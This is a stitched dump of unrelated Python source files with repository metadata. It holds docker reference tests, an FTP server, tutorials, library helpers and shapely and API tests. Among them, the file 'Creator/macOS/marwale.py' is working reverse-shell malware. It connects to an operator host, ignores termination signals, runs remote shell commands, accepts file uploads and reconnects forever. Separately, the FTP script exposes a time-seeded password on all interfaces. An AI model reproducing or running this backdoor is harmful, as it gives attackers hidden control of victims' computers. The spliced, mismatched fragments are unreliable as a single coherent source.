] | 7 | 2019-03-01T06:07:44.000Z | 2021-07-27T03:15:33.000Z | tests/test_reference.py | novirium/docker-image-py | cf4eb19e6fe983b58b10b70816fe1ed02c9e7f09 | [
"Apache-2.0"
] | 6 | 2018-12-16T22:15:19.000Z | 2022-03-30T06:35:40.000Z | import unittest
from docker_image import digest
from docker_image import reference
| 49.806034 | 293 | 0.586672 | import unittest
from docker_image import digest
from docker_image import reference
class TestReference(unittest.TestCase):
    """Tests parsing of docker image reference strings into their components."""
    def test_reference(self):
        """Table-driven check of repository/hostname/tag/digest extraction."""
        def create_test_case(input_, err=None, repository=None, hostname=None, tag=None, digest=None):
            # Helper: bundle one case; a non-None `err` marks input expected to fail.
            return {
                'input': input_,
                'err': err,
                'repository': repository,
                'hostname': hostname,
                'tag': tag,
                'digest': digest,
            }
        test_cases = [
            create_test_case(input_='test_com', repository='test_com'),
            create_test_case(input_='test.com:tag', repository='test.com', tag='tag'),
            create_test_case(input_='test.com:5000', repository='test.com', tag='5000'),
            create_test_case(input_='test.com/repo:tag', repository='test.com/repo', hostname='test.com', tag='tag'),
            create_test_case(input_='test:5000/repo', repository='test:5000/repo', hostname='test:5000'),
            create_test_case(input_='test:5000/repo:tag', repository='test:5000/repo', hostname='test:5000', tag='tag'),
            create_test_case(input_='test:5000/repo@sha256:{}'.format('f' * 64),
                             repository='test:5000/repo', hostname='test:5000', digest='sha256:{}'.format('f' * 64)),
            create_test_case(input_='test:5000/repo:tag@sha256:{}'.format('f' * 64),
                             repository='test:5000/repo', hostname='test:5000', tag='tag', digest='sha256:{}'.format('f' * 64)),
            create_test_case(input_='test:5000/repo', repository='test:5000/repo', hostname='test:5000'),
            create_test_case(input_='', err=reference.NameEmpty),
            create_test_case(input_=':justtag', err=reference.ReferenceInvalidFormat),
            create_test_case(input_='@sha256:{}'.format('f' * 64), err=reference.ReferenceInvalidFormat),
            create_test_case(input_='repo@sha256:{}'.format('f' * 34), err=digest.DigestInvalidLength),
            create_test_case(input_='validname@invaliddigest:{}'.format('f' * 64), err=digest.DigestUnsupported),
            create_test_case(input_='{}a:tag'.format('a/' * 128), err=reference.NameTooLong),
            create_test_case(input_='{}a:tag-puts-this-over-max'.format('a/' * 127), repository='{}a'.format('a/' * 127),
                             hostname='a', tag='tag-puts-this-over-max'),
            create_test_case(input_='aa/asdf$$^/aa', err=reference.ReferenceInvalidFormat),
            create_test_case(input_='sub-dom1.foo.com/bar/baz/quux', repository='sub-dom1.foo.com/bar/baz/quux',
                             hostname='sub-dom1.foo.com'),
            create_test_case(input_='sub-dom1.foo.com/bar/baz/quux:some-long-tag', repository='sub-dom1.foo.com/bar/baz/quux',
                             hostname='sub-dom1.foo.com', tag='some-long-tag'),
            create_test_case(input_='b.gcr.io/test.example.com/my-app:test.example.com',
                             repository='b.gcr.io/test.example.com/my-app', hostname='b.gcr.io', tag='test.example.com'),
            create_test_case(input_='xn--n3h.com/myimage:xn--n3h.com', repository='xn--n3h.com/myimage', hostname='xn--n3h.com',
                             tag='xn--n3h.com'),
            create_test_case(input_='xn--7o8h.com/myimage:xn--7o8h.com@sha512:{}'.format('f' * 128),
                             repository='xn--7o8h.com/myimage', hostname='xn--7o8h.com', tag='xn--7o8h.com',
                             digest='sha512:{}'.format('f' * 128)),
            create_test_case(input_='foo_bar.com:8080', repository='foo_bar.com', tag='8080'),
            create_test_case(input_='foo/foo_bar.com:8080', repository='foo/foo_bar.com', hostname='foo', tag='8080'),
            create_test_case(input_='123.dkr.ecr.eu-west-1.amazonaws.com:lol/abc:d', err=reference.ReferenceInvalidFormat),
        ]
        for tc in test_cases:
            if tc['err']:
                # Invalid inputs must raise the specific documented exception.
                self.assertRaises(tc['err'], reference.Reference.parse, tc['input'])
                continue
            try:
                r = reference.Reference.parse(tc['input'])
            except Exception as e:
                # Re-raise so an unexpected parse failure fails the test loudly.
                raise e
            else:
                # Only compare components the test case actually specifies.
                if tc['repository']:
                    self.assertEqual(tc['repository'], r['name'])
                if tc['hostname']:
                    hostname, _ = r.split_hostname()
                    self.assertEqual(tc['hostname'], hostname)
                if tc['tag']:
                    self.assertEqual(tc['tag'], r['tag'])
                if tc['digest']:
                    self.assertEqual(tc['digest'], r['digest'])
class TestNormalize(unittest.TestCase):
    """Tests normalization of image references to their canonical docker.io forms."""
    def test_parse_repository_info(self):
        """Check familiar/full/ambiguous spellings all normalize identically."""
        def create_test_case(remote_name, familiar_name, full_name, ambiguous_name, domain):
            # Helper: one normalization case; ambiguous_name may be '' when no
            # third spelling exists for the reference.
            return {
                'remote_name': remote_name,
                'familiar_name': familiar_name,
                'full_name': full_name,
                'ambiguous_name': ambiguous_name,
                'domain': domain,
            }
        test_cases = [
            create_test_case('fooo/bar', 'fooo/bar', 'docker.io/fooo/bar', 'index.docker.io/fooo/bar', 'docker.io'),
            create_test_case('library/ubuntu', 'ubuntu', 'docker.io/library/ubuntu', 'library/ubuntu', 'docker.io'),
            create_test_case('nonlibrary/ubuntu', 'nonlibrary/ubuntu', 'docker.io/nonlibrary/ubuntu', '', 'docker.io'),
            create_test_case('other/library', 'other/library', 'docker.io/other/library', '', 'docker.io'),
            create_test_case('private/moonbase', '127.0.0.1:8000/private/moonbase', '127.0.0.1:8000/private/moonbase', '',
                             '127.0.0.1:8000'),
            create_test_case('privatebase', '127.0.0.1:8000/privatebase', '127.0.0.1:8000/privatebase', '', '127.0.0.1:8000'),
            create_test_case('private/moonbase', 'example.com/private/moonbase', 'example.com/private/moonbase', '',
                             'example.com'),
            create_test_case('privatebase', 'example.com/privatebase', 'example.com/privatebase', '', 'example.com'),
            create_test_case('private/moonbase', 'example.com:8000/private/moonbase', 'example.com:8000/private/moonbase', '',
                             'example.com:8000'),
            create_test_case('privatebasee', 'example.com:8000/privatebasee', 'example.com:8000/privatebasee', '',
                             'example.com:8000'),
            create_test_case('library/ubuntu-12.04-base', 'ubuntu-12.04-base', 'docker.io/library/ubuntu-12.04-base',
                             'index.docker.io/library/ubuntu-12.04-base', 'docker.io'),
            create_test_case('library/foo', 'foo', 'docker.io/library/foo', 'docker.io/foo', 'docker.io'),
            create_test_case('library/foo/bar', 'library/foo/bar', 'docker.io/library/foo/bar', '', 'docker.io'),
            create_test_case('store/foo/bar', 'store/foo/bar', 'docker.io/store/foo/bar', '', 'docker.io'),
        ]
        for tc in test_cases:
            # Parse every equivalent spelling of the same reference...
            ref_strings = [tc['familiar_name'], tc['full_name']]
            if tc['ambiguous_name'] != '':
                ref_strings.append(tc['ambiguous_name'])
            refs = []
            for r in ref_strings:
                try:
                    named = reference.Reference.parse_normalized_named(r)
                except Exception as e:
                    # Re-raise so an unexpected parse failure fails the test loudly.
                    raise e
                refs.append(named)
            # ...then assert each normalizes to the same canonical components.
            for r in refs:
                self.assertEqual(tc['familiar_name'], r.familiar_name())
                self.assertEqual(tc['full_name'], r.string())
                self.assertEqual(tc['domain'], r.domain())
                self.assertEqual(tc['remote_name'], r.path())
    def test_validate_reference_name(self):
        """Valid reference names parse; invalid ones raise InvalidReference."""
        valid_repo_names = [
            "docker/docker",
            "library/debian",
            "debian",
            "docker.io/docker/docker",
            "docker.io/library/debian",
            "docker.io/debian",
            "index.docker.io/docker/docker",
            "index.docker.io/library/debian",
            "index.docker.io/debian",
            "127.0.0.1:5000/docker/docker",
            "127.0.0.1:5000/library/debian",
            "127.0.0.1:5000/debian",
            "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
            # This test case was moved from invalid to valid since it is valid input
            # when specified with a hostname, it removes the ambiguity from about
            # whether the value is an identifier or repository name
            "docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
        ]
        invalid_repo_names = [
            "https://github.com/docker/docker",
            "docker/Docker",
            "-docker",
            "-docker/docker",
            "-docker.io/docker/docker",
            "docker///docker",
            "docker.io/docker/Docker",
            "docker.io/docker///docker",
            "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
        ]
        for name in valid_repo_names:
            ref = reference.Reference.parse_normalized_named(name)
            self.assertIsNotNone(ref)
        for name in invalid_repo_names:
            self.assertRaises(reference.InvalidReference, reference.Reference.parse_normalized_named, name)
    def test_validate_remote_name(self):
        """Validate the namespace/name rules for remote repository names."""
        valid_repository_names = [
            # Sanity check.
            "docker/docker",
            # Allow 64-character non-hexadecimal names (hexadecimal names are forbidden).
            "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
            # Allow embedded hyphens.
            "docker-rules/docker",
            # Allow multiple hyphens as well.
            "docker---rules/docker",
            # Username doc and image name docker being tested.
            "doc/docker",
            # single character names are now allowed.
            "d/docker",
            "jess/t",
            # Consecutive underscores.
            "dock__er/docker",
        ]
        invalid_repository_names = [
            # Disallow capital letters.
            "docker/Docker",
            # Only allow one slash.
            "docker///docker",
            # Disallow 64-character hexadecimal.
            "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
            # Disallow leading and trailing hyphens in namespace.
            "-docker/docker",
            "docker-/docker",
            "-docker-/docker",
            # Don't allow underscores everywhere (as opposed to hyphens).
            "____/____",
            "_docker/_docker",
            # Disallow consecutive periods.
            "dock..er/docker",
            "dock_.er/docker",
            "dock-.er/docker",
            # No repository.
            "docker/",
            # namespace too long
            "this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker",
        ]
        for name in valid_repository_names:
            ref = reference.Reference.parse_normalized_named(name)
            self.assertIsNotNone(ref)
        for name in invalid_repository_names:
            self.assertRaises(reference.InvalidReference, reference.Reference.parse_normalized_named, name)
| 11,281 | 36 | 152 |
1a21cf24460bf429e80572cc953d2defbc5d68f5 | 621 | py | Python | ftpserver.py | miebach/py-simple-ftpd | 8e02091a906fee342252a146054d5418db687303 | [
"MIT"
] | 5 | 2015-02-21T00:00:23.000Z | 2020-05-07T04:21:03.000Z | ftpserver.py | miebach/py-simple-ftpd | 8e02091a906fee342252a146054d5418db687303 | [
"MIT"
] | null | null | null | ftpserver.py | miebach/py-simple-ftpd | 8e02091a906fee342252a146054d5418db687303 | [
"MIT"
] | null | null | null | import time
import sha
from pyftpdlib import ftpserver
username="user"
authorizer = ftpserver.DummyAuthorizer()
password = mysha((str(time.time()) + "babble"))[:7]
print "user:",username
print "password:",password
authorizer.add_user(username, password, "./data", perm="elradfmw")
#authorizer.add_anonymous(".")
ftp_handler = ftpserver.FTPHandler
ftp_handler.authorizer = authorizer
#address = ("127.0.0.1", 21) # listen only on localhost
address = ("", 21) # listen on all interfaces
ftpd = ftpserver.FTPServer(address, ftp_handler)
ftpd.serve_forever() | 23.884615 | 66 | 0.73752 | import time
import sha
from pyftpdlib import ftpserver
def mysha(x):
    """Return the hexadecimal SHA-1 digest of x.

    Accepts str (encoded as UTF-8) or bytes. Uses hashlib, the supported
    replacement for the deprecated ``sha`` module, which was removed in
    Python 3 (hashlib exists since Python 2.5, so this stays compatible
    with this file's Python 2 style).
    """
    import hashlib  # local import keeps this block self-contained
    data = x.encode("utf-8") if isinstance(x, str) else x
    return hashlib.sha1(data).hexdigest()
# Configure a single FTP account whose password is derived from the current
# time, printed to the console at startup.
username="user"
authorizer = ftpserver.DummyAuthorizer()
# First 7 hex chars of a time-based hash; NOTE(review): time-seeded passwords
# are predictable — confirm this is acceptable for the intended use.
password = mysha((str(time.time()) + "babble"))[:7]
print "user:",username
print "password:",password
# perm="elradfmw" grants full read/write permissions on ./data.
authorizer.add_user(username, password, "./data", perm="elradfmw")
#authorizer.add_anonymous(".")
ftp_handler = ftpserver.FTPHandler
ftp_handler.authorizer = authorizer
#address = ("127.0.0.1", 21) # listen only on localhost
address = ("", 21) # listen on all interfaces
ftpd = ftpserver.FTPServer(address, ftp_handler)
# Blocks forever serving FTP requests.
ftpd.serve_forever()
0a54a78b31e4be5894fa62d3e6f6f46c9905bd24 | 4,037 | py | Python | Creator/macOS/marwale.py | rohitnishad613/Glitch | 4f896d85f3de3c98e5c91823ae3a87c4d8fdc97f | [
"MIT"
] | 5 | 2020-09-16T06:27:12.000Z | 2020-09-21T11:14:14.000Z | Creator/macOS/marwale.py | rohitnishad613/Glitch | 4f896d85f3de3c98e5c91823ae3a87c4d8fdc97f | [
"MIT"
] | null | null | null | Creator/macOS/marwale.py | rohitnishad613/Glitch | 4f896d85f3de3c98e5c91823ae3a87c4d8fdc97f | [
"MIT"
] | null | null | null | import os
import socket
import subprocess
import time
import signal
import sys
import struct
while True:
time.sleep(0.1)
main()
| 29.903704 | 116 | 0.489225 | import os
import socket
import subprocess
import time
import signal
import sys
import struct
class Client(object):
def __init__(self):
HERE_IS_YOUR_HOST_AND_PORT
self.socket = None
def register_signal_handler(self):
signal.signal(signal.SIGINT, self.do_notting)
signal.signal(signal.SIGTERM, self.do_notting)
return
def do_notting(self, signal=None, frame=None):
return
def socket_create(self):
try:
self.socket = socket.socket()
except socket.error as e:
return
return
def socket_connect(self):
try:
self.socket.connect((self.serverHost, self.serverPort))
# self.socket.setblocking(1)
except socket.error as e:
time.sleep(5)
raise
try:
self.socket.send(socket.gethostname().encode('utf-8'))
except socket.error as e:
raise
return
def receive_commands(self):
cwd = (os.getcwd() + '> ').encode('utf-8')
self.socket.send(struct.pack('>I', len(cwd)) + cwd)
while True:
output_str = None
data = self.socket.recv(20480)
if data == b'':
break
elif data[:2].decode("utf-8") == 'cd':
directory = data[3:].decode("utf-8")
try:
os.chdir(directory.strip())
except Exception as e:
output_str = "Could not change directory: " + str(e) + "\n"
else:
output_str = ""
elif data[:].decode("utf-8") == 'exit':
return
elif len(data) > 0:
try:
cmd = subprocess.Popen(data[:].decode(
"utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output_bytes = cmd.stdout.read() + cmd.stderr.read()
output_str = output_bytes.decode(
"utf-8", errors="replace")
except Exception as e:
output_str = "Command execution unsuccessful: " + \
str(e) + "\n"
if output_str is not None:
sent_message = (output_str + os.getcwd() +
'> ').encode('utf-8')
try:
self.socket.send(struct.pack(
'>I', len(sent_message)) + sent_message)
except Exception as e:
return
return
def receive_file(self):
fileinfo = self.socket.recv(1024).decode('utf-8')
self.socket.send("N".encode('utf-8'))
fileinfo = fileinfo.split(',')
filesize = fileinfo[1]
filename = fileinfo[0]
total = 0
f = open("./"+filename, 'wb')
l = self.socket.recv(1024)
total = len(l)
while (l):
f.write(l)
if (str(total) != filesize):
l = self.socket.recv(1024)
total = total + len(l)
else:
break
f.close()
return
def receiver(self):
timeout = time.time() + 300
while time.time() < timeout:
data = self.socket.recv(6).decode('utf-8')
if (data == 'shell0'):
self.receive_commands()
timeout = time.time() + 300
elif (data == 'upload'):
self.receive_file()
timeout = time.time() + 300
elif (data == 'discon'):
return
time.sleep(0.5)
return
def main():
    # NOTE(security): entry point of the reverse-shell client — it retries
    # the outbound connection forever (5 s backoff) and then hands control
    # to the remote operator via receiver(). Documented for review only.
    client = Client()
    client.register_signal_handler()
    client.socket_create()
    while True:
        try:
            client.socket_connect()
        except Exception as e:
            time.sleep(5)
        else:
            break
    client.receiver()
    client.socket.close()
    return
# NOTE(security): outermost persistence loop — restarts the whole
# connect/receive cycle forever so the implant keeps calling home.
while True:
    time.sleep(0.1)
    main()
| 3,637 | 0 | 261 |
64343d013519933355c64587bf336eeec5a5ee82 | 1,884 | py | Python | Module1/Day07/module1_day07_ranges.py | mollysaweikis/100DaysPython | 464533eb52944fff8858c2e0e0f3b25f1bff7350 | [
"MIT"
] | 23 | 2019-05-31T18:00:26.000Z | 2021-11-21T19:08:19.000Z | Module1/Day07/module1_day07_ranges.py | btruck552/100DaysPython | 1e45a10387da6d4ebdf8aa5fe13843a4509c8b62 | [
"MIT"
] | null | null | null | Module1/Day07/module1_day07_ranges.py | btruck552/100DaysPython | 1e45a10387da6d4ebdf8aa5fe13843a4509c8b62 | [
"MIT"
] | 42 | 2019-05-31T17:54:28.000Z | 2022-02-12T22:09:51.000Z | """
Author: CaptCorpMURICA
Project: 100DaysPython
File: module1_day07_ranges.py
Creation Date: 6/2/2019, 8:55 AM
Description: Basic instruction of ranges in python.
"""
# A range starts with an index of 0 and ends just before the declared value. The endpoint of a range is not inclusive.
# Therefore, range(10) will contain the values 0 through 9, but it will not include 10.
print(range(10))
print(list(range(10)))
print(range(0, 9, 2) == range(0, 10, 2))
# The range declaration has the format `range(start, stop, step)`.
even = range(0, 10, 2)
odd = range(1, 10, 2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# If the step is negative, then the range values are produced in reverse. The higher number must be in the start
# position if producing results in reverse.
even = range(10, 0, -2)
odd = range(9, 0, -2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# By using a specific step value, a range can be used to identify a collection of numbers divisible by a specific value.
# This example uses the `input()` function to prompt the user for input. It also uses `if/elif/else` statements, which
# will be covered on [Day 10](../Module1/Day10).
val = int(input("Please provide a whole number for the divisibility check: "))
request = int(input("Please provide a whole number, less than 1 million, that is to be tested for divisibility: "))
in_range = range(val, 1000000, val)
if request > 1000000:
    print("Please select a number less than 1 million and try again. Thank you")
elif request in in_range:
    print("{} is divisible by {}.".format(request, val))
else:
    print("{} is not divisible by {}.".format(request, val))
| 50.918919 | 120 | 0.69586 | """
Author: CaptCorpMURICA
Project: 100DaysPython
File: module1_day07_ranges.py
Creation Date: 6/2/2019, 8:55 AM
Description: Basic instruction of ranges in python.
"""
# A range starts with an index of 0 and ends just before the declared value. The endpoint of a range is not inclusive.
# Therefore, range(10) will contain the values 0 through 9, but it will not include 10.
print(range(10))
print(list(range(10)))
print(range(0, 9, 2) == range(0, 10, 2))
# The range declaration has the format `range(start, stop, step)`.
even = range(0, 10, 2)
odd = range(1, 10, 2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# If the step is negative, then the range values are produced in reverse. The higher number must be in the start
# position if producing results in reverse.
even = range(10, 0, -2)
odd = range(9, 0, -2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# By using a specific step value, a range can be used to identify a collection of numbers divisible by a specific value.
# This example uses the `input()` function to prompt the user for input. It also uses `if/elif/else` statements, which
# will be covered on [Day 10](../Module1/Day10).
val = int(input("Please provide a whole number for the divisibility check: "))
request = int(input("Please provide a whole number, less than 1 million, that is to be tested for divisibility: "))
in_range = range(val, 1000000, val)
if request > 1000000:
    print("Please select a number less than 1 million and try again. Thank you")
elif request in in_range:
    print("{} is divisible by {}.".format(request, val))
else:
    print("{} is not divisible by {}.".format(request, val))
| 0 | 0 | 0 |
603451b8330fc6c53dc0f78f6b33e3feeec049e4 | 2,242 | py | Python | env/lib/python3.7/site-packages/cleo/inputs/api.py | Kolawole39/masonite-guides-tutorial | 9a21cc635291a42f0722f69925be1809bb20e01c | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/cleo/inputs/api.py | Kolawole39/masonite-guides-tutorial | 9a21cc635291a42f0722f69925be1809bb20e01c | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/cleo/inputs/api.py | Kolawole39/masonite-guides-tutorial | 9a21cc635291a42f0722f69925be1809bb20e01c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .input_argument import InputArgument
from .input_option import InputOption
def argument(name, description='',
             required=False, default=None, is_list=False,
             validator=None):
    """Build an :class:`InputArgument` from keyword-style options.

    :param name: Name of the argument.
    :type name: str
    :param description: Human-readable description shown in help output.
    :type description: str
    :param required: If True the argument must be supplied by the caller.
    :type required: bool
    :param default: Value used when the argument is omitted.
    :type default: mixed
    :param is_list: If True the argument accepts multiple values.
    :type is_list: bool
    :param validator: Optional validator applied to the value.
    :type validator: Validator or str

    :rtype: InputArgument
    """
    # Translate the boolean flags into the InputArgument mode bitmask.
    mode = InputArgument.REQUIRED if required else InputArgument.OPTIONAL
    if is_list:
        mode |= InputArgument.IS_LIST

    return InputArgument(name, mode, description, default, validator)
def option(name, shortcut=None, description='',
           flag=True, value_required=None, is_list=False,
           default=None, validator=None):
    """Build an :class:`InputOption` from keyword-style options.

    :param name: Name of the option.
    :type name: str
    :param shortcut: Optional one-letter shortcut.
    :type shortcut: str or None
    :param description: Human-readable description shown in help output.
    :type description: str
    :param flag: Whether the option is a flag.
    :type flag: bool
    :param value_required: True -> value required, False -> value optional,
        None -> the option is treated as a flag.
    :type value_required: bool or None
    :param is_list: If True the option accepts multiple values.
    :type is_list: bool
    :param default: Value used when the option is omitted.
    :type default: mixed
    :param validator: Optional validator applied to the value.
    :type validator: Validator or str

    :rtype: InputOption
    """
    # NOTE(review): `flag` is never consulted here — flag-ness is implied by
    # value_required being neither True nor False. Confirm this is intended.
    if value_required is True:
        mode = InputOption.VALUE_REQUIRED
    elif value_required is False:
        mode = InputOption.VALUE_OPTIONAL
    else:
        mode = InputOption.VALUE_IS_FLAG

    if is_list:
        mode |= InputOption.VALUE_IS_LIST

    return InputOption(name, shortcut, mode, description,
                       default, validator)
| 24.911111 | 69 | 0.67083 | # -*- coding: utf-8 -*-
from .input_argument import InputArgument
from .input_option import InputOption
def argument(name, description='',
             required=False, default=None, is_list=False,
             validator=None):
    """Build an :class:`InputArgument` from keyword-style options.

    :param name: Name of the argument.
    :type name: str
    :param description: Human-readable description shown in help output.
    :type description: str
    :param required: If True the argument must be supplied by the caller.
    :type required: bool
    :param default: Value used when the argument is omitted.
    :type default: mixed
    :param is_list: If True the argument accepts multiple values.
    :type is_list: bool
    :param validator: Optional validator applied to the value.
    :type validator: Validator or str

    :rtype: InputArgument
    """
    # Translate the boolean flags into the InputArgument mode bitmask.
    mode = InputArgument.REQUIRED if required else InputArgument.OPTIONAL
    if is_list:
        mode |= InputArgument.IS_LIST

    return InputArgument(name, mode, description, default, validator)
def option(name, shortcut=None, description='',
           flag=True, value_required=None, is_list=False,
           default=None, validator=None):
    """Build an :class:`InputOption` from keyword-style options.

    :param name: Name of the option.
    :type name: str
    :param shortcut: Optional one-letter shortcut.
    :type shortcut: str or None
    :param description: Human-readable description shown in help output.
    :type description: str
    :param flag: Whether the option is a flag.
    :type flag: bool
    :param value_required: True -> value required, False -> value optional,
        None -> the option is treated as a flag.
    :type value_required: bool or None
    :param is_list: If True the option accepts multiple values.
    :type is_list: bool
    :param default: Value used when the option is omitted.
    :type default: mixed
    :param validator: Optional validator applied to the value.
    :type validator: Validator or str

    :rtype: InputOption
    """
    # NOTE(review): `flag` is never consulted here — flag-ness is implied by
    # value_required being neither True nor False. Confirm this is intended.
    if value_required is True:
        mode = InputOption.VALUE_REQUIRED
    elif value_required is False:
        mode = InputOption.VALUE_OPTIONAL
    else:
        mode = InputOption.VALUE_IS_FLAG

    if is_list:
        mode |= InputOption.VALUE_IS_LIST

    return InputOption(name, shortcut, mode, description,
                       default, validator)
| 0 | 0 | 0 |
b133940306ca184bafd714abfed2a77c71123f21 | 181 | py | Python | oidc_auth/forms.py | lccvufal/django-oidc-auth | ce36f1b83bce6f2bcf23fe40b94662eb5953cd4b | [
"MIT"
] | 25 | 2015-02-09T14:07:32.000Z | 2019-06-20T02:49:02.000Z | oidc_auth/forms.py | lccvufal/django-oidc-auth | ce36f1b83bce6f2bcf23fe40b94662eb5953cd4b | [
"MIT"
] | 11 | 2015-03-06T18:32:09.000Z | 2021-08-31T20:08:18.000Z | oidc_auth/forms.py | lccvufal/django-oidc-auth | ce36f1b83bce6f2bcf23fe40b94662eb5953cd4b | [
"MIT"
] | 23 | 2015-02-24T23:18:47.000Z | 2020-11-16T08:04:13.000Z | from django import forms
| 25.857143 | 71 | 0.712707 | from django import forms
class OpenIDConnectForm(forms.Form):
    """Form that collects the issuer URL of an OpenID Connect provider."""

    issuer = forms.CharField(
        max_length=200,
        widget=forms.TextInput(attrs={'class': 'required openid'}),
    )
| 0 | 132 | 23 |
b867197194af426b236ef30f05c0ba6ee90697c1 | 3,263 | py | Python | tests/test_polylabel.py | tfardet/Shapely | 462de3aa7a8bbd80408762a2d5aaf84b04476e4d | [
"BSD-3-Clause"
] | null | null | null | tests/test_polylabel.py | tfardet/Shapely | 462de3aa7a8bbd80408762a2d5aaf84b04476e4d | [
"BSD-3-Clause"
] | null | null | null | tests/test_polylabel.py | tfardet/Shapely | 462de3aa7a8bbd80408762a2d5aaf84b04476e4d | [
"BSD-3-Clause"
] | null | null | null | from . import unittest
from shapely.algorithms.polylabel import polylabel, Cell
from shapely.geometry import LineString, Point, Polygon
from shapely.errors import TopologicalError
| 38.388235 | 80 | 0.594851 | from . import unittest
from shapely.algorithms.polylabel import polylabel, Cell
from shapely.geometry import LineString, Point, Polygon
from shapely.errors import TopologicalError
class PolylabelTestCase(unittest.TestCase):
    """Tests for shapely's polylabel (pole-of-inaccessibility) algorithm."""
    def test_polylabel(self):
        """
        Finds pole of inaccessibility for a polygon with a tolerance of 10
        """
        polygon = LineString([(0, 0), (50, 200), (100, 100), (20, 50),
                              (-100, -20), (-150, -200)]).buffer(100)
        label = polylabel(polygon, tolerance=10)
        # Expected coordinates pinned from a known-good run of the algorithm.
        expected = Point(59.35615556364569, 121.8391962974644)
        self.assertTrue(expected.equals_exact(label, 1e-6))
    def test_invalid_polygon(self):
        """
        Makes sure that the polylabel function throws an exception when provided
        an invalid polygon.
        """
        # Self-intersecting ("bowtie") ring -> topologically invalid polygon.
        bowtie_polygon = Polygon([(0, 0), (0, 20), (10, 10), (20, 20),
                                  (20, 0), (10, 10), (0, 0)])
        self.assertRaises(TopologicalError, polylabel, bowtie_polygon)
    def test_cell_sorting(self):
        """
        Tests rich comparison operators of Cells for use in the polylabel
        minimum priority queue.
        """
        polygon = Point(0, 0).buffer(100)
        cell1 = Cell(0, 0, 50, polygon)  # closest
        cell2 = Cell(50, 50, 50, polygon)  # furthest
        self.assertLess(cell1, cell2)
        self.assertLessEqual(cell1, cell2)
        self.assertFalse(cell2 <= cell1)
        self.assertEqual(cell1, cell1)
        self.assertFalse(cell1 == cell2)
        self.assertNotEqual(cell1, cell2)
        self.assertFalse(cell1 != cell1)
        self.assertGreater(cell2, cell1)
        self.assertFalse(cell1 > cell2)
        self.assertGreaterEqual(cell2, cell1)
        self.assertFalse(cell1 >= cell2)
    def test_concave_polygon(self):
        """
        Finds pole of inaccessibility for a concave polygon and ensures that
        the point is inside.
        """
        concave_polygon = LineString([(500, 0), (0, 0), (0, 500),
                                      (500, 500)]).buffer(100)
        label = polylabel(concave_polygon)
        self.assertTrue(concave_polygon.contains(label))
    def test_rectangle_special_case(self):
        """
        The centroid algorithm used is vulnerable to floating point errors
        and can give unexpected results for rectangular polygons. Test
        that this special case is handled correctly.
        https://github.com/mapbox/polylabel/issues/3
        """
        polygon = Polygon([(32.71997,-117.19310), (32.71997,-117.21065),
                           (32.72408,-117.21065), (32.72408,-117.19310)])
        label = polylabel(polygon)
        self.assertEqual(label.coords[:], [(32.722025, -117.201875)])
    def test_polygon_with_hole(self):
        """
        Finds pole of inaccessibility for a polygon with a hole
        https://github.com/Toblerity/Shapely/issues/817
        """
        polygon = Polygon(
            shell=[(0, 0), (10, 0), (10, 10), (0, 10), (0, 0)],
            holes=[[(2, 2), (6, 2), (6, 6), (2, 6), (2, 2)]],
        )
        label = polylabel(polygon, 0.05)
        self.assertAlmostEqual(label.x, 7.65625)
        self.assertAlmostEqual(label.y, 7.65625)
ede842ae17f244943ab73140632c28eb84e35b08 | 20,307 | py | Python | api/test/hand_handler_test.py | jrockway/tichu-tournament | 6335b8fab89b76c42ac5a078176a500a11f0e4ff | [
"MIT"
] | null | null | null | api/test/hand_handler_test.py | jrockway/tichu-tournament | 6335b8fab89b76c42ac5a078176a500a11f0e4ff | [
"MIT"
] | null | null | null | api/test/hand_handler_test.py | jrockway/tichu-tournament | 6335b8fab89b76c42ac5a078176a500a11f0e4ff | [
"MIT"
] | null | null | null | import json
import unittest
import webtest
import os
from google.appengine.ext import testbed
from api.src import main
| 44.24183 | 83 | 0.610922 | import json
import unittest
import webtest
import os
from google.appengine.ext import testbed
from api.src import main
class AppTest(unittest.TestCase):
    """End-to-end tests of the tournament hand API (HEAD/PUT/DELETE on
    /api/tournaments/<id>/hands/<board>/<ns>/<ew>) against the GAE testbed."""
    def setUp(self):
        """Spin up a GAE testbed (datastore + memcache) and a WSGI test app."""
        os.environ['AUTH_DOMAIN'] = 'testbed'
        self.testbed = testbed.Testbed()
        self.testbed.activate()
        self.testbed.init_datastore_v3_stub()
        self.testbed.init_memcache_stub()
        self.testapp = webtest.TestApp(main.app)
    def tearDown(self):
        """Tear down the testbed so stubs do not leak between tests."""
        self.testbed.deactivate()
    def testHead_bad_id(self):
        # Unknown tournament id -> 404 even when the hand exists elsewhere.
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        self.logoutUser()
        response = self.testapp.head("/api/tournaments/{}a/hands/1/2/3".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
    def testHead_bad_parameters(self):
        # Malformed or out-of-range board/pair numbers -> 404.
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        self.logoutUser()
        response = self.testapp.head("/api/tournaments/{}/hands/1a/2/3".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.head("/api/tournaments/{}/hands/0/2/3".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
